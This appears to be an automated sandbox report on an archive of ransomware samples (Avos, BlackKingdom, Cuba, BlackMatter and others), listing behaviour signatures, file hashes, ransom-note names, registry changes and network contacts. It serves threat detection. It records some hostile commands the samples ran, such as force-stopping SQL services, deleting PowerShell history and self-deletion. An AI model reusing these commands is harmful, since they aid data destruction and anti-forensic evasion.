Analysis Overview
SHA256
c5741701b3866459dd1ffa2477cfd8776713612912693a5897f78aac795d23e9
Threat Level: Known bad
The file RS.7z was found to be: Known bad.
Malicious Activity Summary
MedusaLocker payload
Makop
UAC bypass
Avoslocker Ransomware
Mespinoza family
Conti Ransomware
Detects Go variant of Hive Ransomware
Sodinokibi family
BlackMatter Ransomware
Avaddon
Blackmatter family
Hades payload
Hades Ransomware
Lockbit
Hive
Medusalocker family
DarkSide
Babuk Locker
DearCry
CryptOne packer
Modifies boot configuration data using bcdedit
Renames multiple (133) files with added filename extension
Renames multiple (179) files with added filename extension
Renames multiple (9368) files with added filename extension
Renames multiple (160) files with added filename extension
Renames multiple (3331) files with added filename extension
Renames multiple (150) files with added filename extension
Renames multiple (7382) files with added filename extension
Renames multiple (153) files with added filename extension
Renames multiple (162) files with added filename extension
Renames multiple (8801) files with added filename extension
Renames multiple (164) files with added filename extension
Renames multiple (77) files with added filename extension
Renames multiple (227) files with added filename extension
Deletes shadow copies
Renames multiple (180) files with added filename extension
Renames multiple (158) files with added filename extension
Renames multiple (1641) files with added filename extension
Renames multiple (450) files with added filename extension
Renames multiple (7310) files with added filename extension
Renames multiple (7995) files with added filename extension
Renames multiple (6418) files with added filename extension
Renames multiple (66) files with added filename extension
Renames multiple (174) files with added filename extension
Renames multiple (246) files with added filename extension
Renames multiple (257) files with added filename extension
Drops file in Drivers directory
Deletes backup catalog
Boot or Logon Autostart Execution: Active Setup
UPX packed file
Deletes itself
Reads user/profile data of web browsers
Executes dropped EXE
Drops startup file
Boot or Logon Autostart Execution: Print Processors
Loads dropped DLL
Checks computer location settings
Enumerates connected drives
Adds Run key to start application
Looks up external IP address via web service
Drops desktop.ini file(s)
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Sets desktop wallpaper using registry
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Program Files directory
Drops file in Windows directory
Program crash
Detects Pyinstaller
Unsigned PE
Enumerates physical storage devices
NSIS installer
Uses Task Scheduler COM API
Modifies registry class
Views/modifies file attributes
Uses Volume Shadow Copy service COM API
Suspicious use of AdjustPrivilegeToken
System policy modification
Suspicious behavior: EnumeratesProcesses
Modifies Control Panel
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Modifies system certificate store
Suspicious behavior: MapViewOfSection
Interacts with shadow copies
Checks SCSI registry key(s)
Runs ping.exe
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-07-07 14:07
Signatures
Blackmatter family
MedusaLocker payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Medusalocker family
Mespinoza family
Sodinokibi family
CryptOne packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240704-en
Max time kernel
1563s
Max time network
1570s
Command Line
Signatures
Avoslocker Ransomware
Renames multiple (77) files with added filename extension
Suspicious behavior: EnumeratesProcesses
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"
Network
Files
C:\MSOCache\GET_YOUR_FILES_BACK.txt
| MD5 | 0237b63f764204e00d7242cc4d908271 |
| SHA1 | 9d88e59463e2a963bea95d6a2cc5383e922f2f27 |
| SHA256 | 7bee0aff7241590f5bd35727a1a544a492b7533f1acba685611dd269078d1857 |
| SHA512 | 0daec31046c2704b30760f7aecc944f9591cdf22511e5e9276f3dbc376cc60b04853c3e25abca2e754aeaaaac49c264c7d89d418c832c8275fb5484d51a99b3e |
Analysis: behavioral9
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240704-en
Max time kernel
1799s
Max time network
1568s
Command Line
Signatures
Loads dropped DLL
Reads user/profile data of web browsers
Drops desktop.ini file(s)
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell Get-Service *sql*|Stop-Service -Force 2>$null
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Service *sql*
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell rm (Get-PSReadlineOption).HistorySavePath
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell rm (Get-PSReadlineOption).HistorySavePath
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | mega.io | udp |
| LU | 89.44.169.132:80 | mega.io | tcp |
| LU | 89.44.169.132:443 | mega.io | tcp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| LU | 66.203.125.16:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.16:443 | g.api.mega.co.nz | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI21482\ucrtbase.dll
| MD5 | 298e85be72551d0cdd9ed650587cfdc6 |
| SHA1 | 5a82bcc324fb28a5147b4e879b937fb8a56b760c |
| SHA256 | eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84 |
| SHA512 | 3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02 |
\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-core-localization-l1-2-0.dll
| MD5 | 54d2f426bc91ecf321908d133b069b20 |
| SHA1 | 78892ea2873091f016daa87d2c0070b6c917131f |
| SHA256 | 646b28a20208be68439d73efa21be59e12ed0a5fe9e63e5d3057ca7b84bc6641 |
| SHA512 | 6b1b095d5e3cc3d5909ebda4846568234b9bc43784919731dd906b6fa62aa1fdf723ac0d18bca75d74616e2c54c82d1402cc8529d75cb1d7744f91622ac4ec06 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | d1b3cc23127884d9eff1940f5b98e7aa |
| SHA1 | d1b108e9fce8fba1c648afaad458050165502878 |
| SHA256 | 51a73fbfa2afe5e45962031618ec347aaa0857b11f3cf273f4c218354bfe70cb |
| SHA512 | ee5e0d546190e8ba9884ab887d11bb18fc71d3878983b544cd9ab80b6dd18ad65e66fe49fe0f4b92cbc51992fb1c39de091cf789159625341a03f4911b968fa2 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-core-file-l1-2-0.dll
| MD5 | b5060343583e6be3b3de33ccd40398e0 |
| SHA1 | 5b33b8db5d6cfb0e8a5bb7f209df2c6191b02edb |
| SHA256 | 27878021c6d48fb669f1822821b5934f5a2904740bebb340b6849e7635490cb7 |
| SHA512 | 86610edc05aa1b756c87160f9eefe9365e3f712c5bed18c8feca3cae12aef07ccc44c45c4be19dc8f9d337a6f6709b260c89019a5efcfe9fa0847d85ab64d282 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | 36165a5050672b7b0e04cb1f3d7b1b8f |
| SHA1 | ef17c4622f41ef217a16078e8135acd4e2cf9443 |
| SHA256 | d7ab47157bff1b2347e7ae945517b4fc256425939ba7b6288ff85a51931568a7 |
| SHA512 | da360ff716bb66dd1adb5d86866b4b81b08a6fe86362fded05430f833a96934ccdada1b3081b55766a4a30c16d0d62aa1715b8839ea5c405a40d9911715dae68 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-core-file-l2-1-0.dll
| MD5 | 2e8995e2320e313545c3ddb5c71dc232 |
| SHA1 | 45d079a704bec060a15f8eba3eab22ac5cf756c6 |
| SHA256 | c55eb043454ac2d460f86ea26f934ecb16bdb1d05294c168193a05090bf1c56c |
| SHA512 | 19adcc5dd98f30b4eebefe344e1939c93c284c802043ea3ac22654cf2e23692f868a00a482c9be1b1e88089a5031fa81a3f1165175224309828bd28ee12f2d49 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\python37.dll
| MD5 | c4709f84e6cf6e082b80c80b87abe551 |
| SHA1 | c0c55b229722f7f2010d34e26857df640182f796 |
| SHA256 | ca8e39f2b1d277b0a24a43b5b8eada5baf2de97488f7ef2484014df6e270b3f3 |
| SHA512 | e04a5832b9f2e1e53ba096e011367d46e6710389967fa7014a0e2d4a6ce6fc8d09d0ce20cee7e7d67d5057d37854eddab48bef7df1767f2ec3a4ab91475b7ce4 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\VCRUNTIME140.dll
| MD5 | 89a24c66e7a522f1e0016b1d0b4316dc |
| SHA1 | 5340dd64cfe26e3d5f68f7ed344c4fd96fbd0d42 |
| SHA256 | 3096cafb6a21b6d28cf4fe2dd85814f599412c0fe1ef090dd08d1c03affe9ab6 |
| SHA512 | e88e0459744a950829cd508a93e2ef0061293ab32facd9d8951686cbe271b34460efd159fd8ec4aa96ff8a629741006458b166e5cff21f35d049ad059bc56a1a |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-runtime-l1-1-0.dll
| MD5 | dbd23405e7baa8e1ac763fa506021122 |
| SHA1 | c50ae9cc82c842d50c4317034792d034ac7eb5be |
| SHA256 | 57fe2bab2acb1184a468e45cebe7609a2986d5220bb2d82592b9ca6e22384f89 |
| SHA512 | dafea32e44224b40dcc9ca96fd977a7c14128ca1dd0a6144844537d52ba25bcec83c2fa94a665a7497be9e079e7fc71298b950e3a8a0c03c4a5c8172f11063b9 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-string-l1-1-0.dll
| MD5 | aacade02d7aaf6b5eff26a0e3a11c42d |
| SHA1 | 93b8077b535b38fdb0b7c020d24ba280adbe80c3 |
| SHA256 | e71d517e6b7039437e3fc449d8ad12eeeca0d5c8ed1c500555344fd90ddc3207 |
| SHA512 | e02fcbcb70100f67e65903d8b1a7e6314cabfb0b14797bd6e1c92b7bcb3994a54133e35d16da0a29576145b2783221330591526f856b79a25c0575fc923985a6 |
\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-stdio-l1-1-0.dll
| MD5 | 5df2410c0afd30c9a11de50de4798089 |
| SHA1 | 4112c5493009a1d01090ccae810500c765dc6d54 |
| SHA256 | e6a1ef1f7c1957c50a3d9c1d70c0f7b0d8badc7f279cd056eb179dc256bfefda |
| SHA512 | 8ecb79078d05d5b2a432f511953985b3253d5d43d87709a5795709ee8dbca63c5f1166ed94d8984c13f2ea06adfa7d6b82c6735c23c6e64f2f37a257066864e6 |
\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-heap-l1-1-0.dll
| MD5 | a22f9a4cbd701209842b204895fedf37 |
| SHA1 | 72fa50160baf1f2ea2adcff58f3f90a77a59d949 |
| SHA256 | 2ee3d52640d84ac4f7f7ddfe748f51baa6fd0d492286c781251222420e85ca97 |
| SHA512 | 903755d4fa6651669295a10e66be8ea223cd8d5ad60ebe06188d8b779fef7e964d0aa26dc5479f14aab655562d3c1ef76b86790fb97f991eaf52da0f70e40529 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-convert-l1-1-0.dll
| MD5 | 0485c463cd8d2ae1cbd42df6f0591246 |
| SHA1 | ea634140905078e8f687a031ae919cff23c27e6f |
| SHA256 | 983f4d4c7b7330e7f5f091080c1e81905575ebccd97e11dff8a064979ec8d9b8 |
| SHA512 | ddf947a1b86c3826859570a3e1d59e4ec4564cfcf25c84841383a4b5f5ad6c2fe618078416aed201fb744d5fbd6c39dab7c1e964dd5e148da018a825fcc0044a |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-math-l1-1-0.dll
| MD5 | c4cac2d609bb5e0da9017ebb535634ce |
| SHA1 | 51a264ce4545a2f0d9f2908771e01e001b4e763e |
| SHA256 | 7c3336c3a50bf3b4c5492c0d085519c040878243e9f7d3ea9f6a2e35c8f1f374 |
| SHA512 | 3b55bdbc5132d05ab53852605afe6ed49f4b3decdde8b11f19a621a78a37d98c7aeaaa8c10bf4565b9b50162816305fa5192ee31950a96dc08ae46bfc6af4ffe |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-locale-l1-1-0.dll
| MD5 | ba17b278fff2c18e34e47562ddde8166 |
| SHA1 | bed762d11b98737fcf1d1713d77345ec4780a8c2 |
| SHA256 | c36f5c0ac5d91a8417866dd4d8c670c2192ba83364693e7438282fb8678c3d1e |
| SHA512 | 72516b81606ccf836549c053325368e93264fdebc7092e42e3df849a16ccefa81b7156ae5609e227faa7c9c1bf9d68b2ac349791a839f4575728f350dd048f27 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-environment-l1-1-0.dll
| MD5 | e48a1860000fd2bd61566e76093984f5 |
| SHA1 | aa3f233fb19c9e7c88d4307bade2a6eef6518a8a |
| SHA256 | 67bbb287b2e9057bf8b412ad2faa266321ac28c6e6ba5f22169e2517a3ead248 |
| SHA512 | 46b384c45d2fe2b70a5ac8ee087ba55828a62ccab876a21a3abd531d4de5ec7be21ff34b2284e0231b6cf0869eba09599c3b403db84448f20bd0fff88c1956d5 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-process-l1-1-0.dll
| MD5 | d8a5c1960281ec59fd4164c983516d7c |
| SHA1 | 29e6feff9fb16b9d8271b7da6925baf3c6339d06 |
| SHA256 | 12bb3f480ec115d5f9447414525c5dcd236ed48356d5a70650541c9499bc4d19 |
| SHA512 | c97aa4029bcd8ffc490547dd78582ac81049dded2288102b800287a7fb623d9fde327702f8a24dfe2d2d67b2c9aaf97050756474faa4914ca4cb6038449c64bf |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-conio-l1-1-0.dll
| MD5 | 75e626c3ebf160ebe75c59d3d6ac3739 |
| SHA1 | 02a99199f160020b1086cec6c6a2983908641b65 |
| SHA256 | 762ca8dd14f8ff603d06811ba904c973a684022202476bca45e9dc1345151ac4 |
| SHA512 | 5ad205b90ac1658c5b07f6f212a82be8792999b68f9c9617a1298b04d83e7fcb9887ed307a9d31517bcba703b3ee6699ea93f67b06629355ea6519fed0a6d29a |
\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-time-l1-1-0.dll
| MD5 | 0d9afb006f46478008c180b9da5465ac |
| SHA1 | 3be2f543bbc8d9f1639d0ed798c5856359a9f29b |
| SHA256 | c3a70153e1d0ecd1cbf95de033bfef5cfecabe7a8274cafe272cc2c14865cd8c |
| SHA512 | 4bd76efcb2432994d10884c302aee6cadbc2d594bbbd4e654c1e8547a1efd76fd92e4879b8120dfacb5e8a77826009f72faa5727b1aa559ed3fc86d0ce3ed029 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-filesystem-l1-1-0.dll
| MD5 | 1193f810519fbc07beb3ffbad3247fc4 |
| SHA1 | db099628a19b2d34e89028c2e16bc89df28ed78f |
| SHA256 | ab2158fe6b354fb429f57f374ca25105b44e97edcbdc1b752650d895dadd6fd1 |
| SHA512 | 3222a10c3be5098aca0211015efe75cfbcd408fd28315acedd016d8f77513f81e207536b072001525965635da39c4aae8ef9f6ad367f5d695de67b1614179353 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\base_library.zip
| MD5 | a70f10b994f5b2e03777b4d355eef788 |
| SHA1 | 141be3cef837cf6120f71c714259d9799586b483 |
| SHA256 | 766089d80d0136ce9a4f24f1dd717a8575b0075c5d9c3c72b84807e0647ffa2c |
| SHA512 | 5651e26f0a3de35e455977d3cfc06e2b38defe5e52656e3213177a0a621eca3b3391bf414371cecf88d9ff903747231092b8d1d2206d5f020e1c438c70d8eb38 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\_ctypes.pyd
| MD5 | 5e869eebb6169ce66225eb6725d5be4a |
| SHA1 | 747887da0d7ab152e1d54608c430e78192d5a788 |
| SHA256 | 430f1886caf059f05cde6eb2e8d96feb25982749a151231e471e4b8d7f54f173 |
| SHA512 | feb6888bb61e271b1670317435ee8653dedd559263788fbf9a7766bc952defd7a43e7c3d9f539673c262abedd97b0c4dd707f0f5339b1c1570db4e25da804a16 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\_socket.pyd
| MD5 | 8ea18d0eeae9044c278d2ea7a1dbae36 |
| SHA1 | de210842da8cb1cb14318789575d65117d14e728 |
| SHA256 | 9822c258a9d25062e51eafc45d62ed19722e0450a212668f6737eb3bfe3a41c2 |
| SHA512 | d275ce71d422cfaacef1220dc1f35afba14b38a205623e3652766db11621b2a1d80c5d0fb0a7df19402ebe48603e76b8f8852f6cbff95a181d33e797476029f0 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\select.pyd
| MD5 | fb4a0d7abaeaa76676846ad0f08fefa5 |
| SHA1 | 755fd998215511506edd2c5c52807b46ca9393b2 |
| SHA256 | 65a3c8806d456e9df2211051ed808a087a96c94d38e23d43121ac120b4d36429 |
| SHA512 | f5b3557f823ee4c662f2c9b7ecc5497934712e046aa8ae8e625f41756beb5e524227355316f9145bfabb89b0f6f93a1f37fa94751a66c344c38ce449e879d35f |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\pywintypes37.dll
| MD5 | 77b6875977e77c4619bbb471d5eaf790 |
| SHA1 | f08c3bc5e918c0a197fbfd1b15e7c0491bd5fade |
| SHA256 | 780a72ba3215ff413d5a9e98861d8bb87c15c43a75bb81dc985034ae7dcf5ef6 |
| SHA512 | 783939fc97b2445dfe7e21eb6b71711aba6d85e275e489eddcc4f20c2ed018678d8d14c9e1856f66e3876f318312d69c22cee77f9105a72e56a1be4f3e8a7c2e |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\_ssl.pyd
| MD5 | 5a393bb4f3ae499541356e57a766eb6a |
| SHA1 | 908f68f4ea1a754fd31edb662332cf0df238cf9a |
| SHA256 | b6593b3af0e993fd5043a7eab327409f4bf8cdcd8336aca97dbe6325aefdb047 |
| SHA512 | 958584fd4efaa5dd301cbcecbfc8927f9d2caec9e2826b2af9257c5eefb4b0b81dbbadbd3c1d867f56705c854284666f98d428dc2377ccc49f8e1f9bbbed158f |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\libcrypto-1_1.dll
| MD5 | cc4cbf715966cdcad95a1e6c95592b3d |
| SHA1 | d5873fea9c084bcc753d1c93b2d0716257bea7c3 |
| SHA256 | 594303e2ce6a4a02439054c84592791bf4ab0b7c12e9bbdb4b040e27251521f1 |
| SHA512 | 3b5af9fbbc915d172648c2b0b513b5d2151f940ccf54c23148cd303e6660395f180981b148202bef76f5209acc53b8953b1cb067546f90389a6aa300c1fbe477 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-utility-l1-1-0.dll
| MD5 | 9b622ca5388b6400705c8f21550bae8e |
| SHA1 | eb599555448bf98cdeabc2f8b10cfe9bd2181d9f |
| SHA256 | af1e1b84f066ba05da20847bffd874d80a810b5407f8c6647b3ff9e8f7d37863 |
| SHA512 | 9872f54ac744cf537826277f1c0a3fd00c5aa51f353692c1929be7bc2e3836e1a52cab2c467ba675d4052ac3116f5622755c3db8be389c179f7d460391105545 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\libssl-1_1.dll
| MD5 | bc778f33480148efa5d62b2ec85aaa7d |
| SHA1 | b1ec87cbd8bc4398c6ebb26549961c8aab53d855 |
| SHA256 | 9d4cf1c03629f92662fc8d7e3f1094a7fc93cb41634994464b853df8036af843 |
| SHA512 | 80c1dd9d0179e6cc5f33eb62d05576a350af78b5170bfdf2ecda16f1d8c3c2d0e991a5534a113361ae62079fb165fff2344efd1b43031f1a7bfda696552ee173 |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\_hashlib.pyd
| MD5 | b32cb9615a9bada55e8f20dcea2fbf48 |
| SHA1 | a9c6e2d44b07b31c898a6d83b7093bf90915062d |
| SHA256 | ca4f433a68c3921526f31f46d8a45709b946bbd40f04a4cfc6c245cb9ee0eab5 |
| SHA512 | 5c583292de2ba33a3fc1129dfb4e2429ff2a30eeaf9c0bcff6cca487921f0ca02c3002b24353832504c3eec96a7b2c507f455b18717bcd11b239bbbbd79fadbe |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\tcl86t.dll
| MD5 | c0b23815701dbae2a359cb8adb9ae730 |
| SHA1 | 5be6736b645ed12e97b9462b77e5a43482673d90 |
| SHA256 | f650d6bc321bcda3fc3ac3dec3ac4e473fb0b7b68b6c948581bcfc54653e6768 |
| SHA512 | ed60384e95be8ea5930994db8527168f78573f8a277f8d21c089f0018cd3b9906da764ed6fcc1bd4efad009557645e206fbb4e5baef9ab4b2e3c8bb5c3b5d725 |
\Users\Admin\AppData\Local\Temp\_MEI21482\_tkinter.pyd
| MD5 | 09f66528018ffef916899845d6632307 |
| SHA1 | cf9ddad46180ef05a306dcb05fdb6f24912a69ce |
| SHA256 | 34d89fe378fc10351d127fb85427449f31595eccf9f5d17760b36709dd1449b9 |
| SHA512 | ed406792d8a533db71bd71859edbb2c69a828937757afec1a83fd1eacb1e5e6ec9afe3aa5e796fa1f518578f6d64ff19d64f64c9601760b7600a383efe82b3de |
C:\Users\Admin\AppData\Local\Temp\_MEI21482\tk86t.dll
| MD5 | fdc8a5d96f9576bd70aa1cadc2f21748 |
| SHA1 | bae145525a18ce7e5bc69c5f43c6044de7b6e004 |
| SHA256 | 1a6d0871be2fa7153de22be008a20a5257b721657e6d4b24da8b1f940345d0d5 |
| SHA512 | 816ada61c1fd941d10e6bb4350baa77f520e2476058249b269802be826bab294a9c18edc5d590f5ed6f8dafed502ab7ffb29db2f44292cb5bedf2f5fa609f49c |
memory/1380-1099-0x0000000002D70000-0x0000000002DF0000-memory.dmp
memory/1380-1100-0x000000001B560000-0x000000001B842000-memory.dmp
memory/1380-1101-0x0000000001EF0000-0x0000000001EF8000-memory.dmp
C:\MSOCache\All Users\decrypt_file.TxT
| MD5 | a36d9aeb2b6bc7da5a8b336bbc4f542e |
| SHA1 | f5caf80eccd8a2ee2095cfe4a3f2d796c6b47bc0 |
| SHA256 | 3144df848208a9edef3e03d32a5ba4bf105186f48f7ed9e267876e4064681f9f |
| SHA512 | a2aef5507e493340c95250f43227d8a6835c832d6a852e1b850e67ecccfa3934061220aa8bd94fa38721687681e9363f75ad364bb47c81c126c6f51fac682fa5 |
Analysis: behavioral15
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240705-en
Max time kernel
1560s
Max time network
1566s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2108 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2108 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2108 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2108 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"
C:\Windows\SysWOW64\cmd.exe
/c del C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe >> NUL
Network
Files
memory/2108-0-0x0000000000520000-0x0000000000580000-memory.dmp
memory/2108-1-0x0000000000400000-0x000000000046C000-memory.dmp
C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\!!FAQ for Decryption!!.txt
| MD5 | 69acb73a5829bdddc9a7cf322178c70f |
| SHA1 | 3cd71f6cc40c90322e027712403899db2976218b |
| SHA256 | 9aaf714f40a29e0b10c038a79e26a95a934b7eeec3512a970d8c80f8a6daebd5 |
| SHA512 | 380b506e330f4592cceee56334131cf6493bd989464afc5503bbd6bec0b9073475cfabbd8f37e471cac9f67fbfe07e747660ff6b9f5e0d9d14761e80ead6c57e |
memory/2108-1800-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2108-3317-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2108-4023-0x0000000000400000-0x000000000046C000-memory.dmp
memory/2108-5030-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2108-6488-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2108-8218-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2108-8549-0x0000000000400000-0x000000000046C000-memory.dmp
memory/2108-8548-0x0000000000400000-0x000000000051D000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240508-en
Max time kernel
1560s
Max time network
1562s
Command Line
Signatures
BlackMatter Ransomware
Renames multiple (180) files with added filename extension
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\XS6hn5xhL.bmp" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\XS6hn5xhL.bmp" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\International | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\Desktop | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
